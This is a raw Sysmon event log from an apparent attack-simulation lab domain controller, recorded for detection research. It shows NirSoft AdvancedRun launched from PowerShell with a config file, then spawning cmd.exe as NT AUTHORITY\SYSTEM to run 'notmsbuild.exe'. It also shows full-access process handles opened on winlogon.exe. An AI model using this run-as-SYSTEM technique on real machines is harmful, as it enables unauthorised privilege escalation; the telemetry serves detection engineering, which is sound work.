20:09:25.957{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068042Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.957{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068041Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.956{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068040Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.956{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068039Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.955{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068038Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.955{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068037Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.955{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068036Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.955{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068035Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.955{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068034Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.954{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068033Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.953{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068032Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.952{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068031Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.951{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068030Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.951{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068029Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.950{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068028Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.950{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068027Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.949{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068026Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.948{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068025Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.948{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068024Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.947{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068023Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.947{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068022Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.946{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068021Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.946{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000004068020Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.939{834264DD-DAF8-61EA-5B00-000000002702}41004280C:\Windows\system32\csrss.exe{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004068019Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.937{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000004068018Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.934{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfgC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000004067496Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.671{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 154100x80000000000000004067491Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.667{834264DD-12D9-61EB-4708-000000002702}3328C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\System32\cmd.exe" /c notmsbuild.exeC:\Windows\System32\NT AUTHORITY\SYSTEM{834264DD-DAE4-61EA-E703-000000000000}0x3e72SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg /runATTACKRANGE\Administrator 10341000x80000000000000004067490Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.665{834264DD-DAE7-61EA-1700-000000002702}13003992C:\Windows\System32\svchost.exe{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004067489Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.665{834264DD-DAE7-61EA-1700-000000002702}13003992C:\Windows\System32\svchost.exe{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004067488Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.663{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21f3|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21bd|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067487Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.663{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-12C7-61EB-4508-000000002702}2204C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004067486Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.663{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C807-000000002702}3452C:\Program Files\OpenJDK\jdk-17.0.1\bin\java.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004067485Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 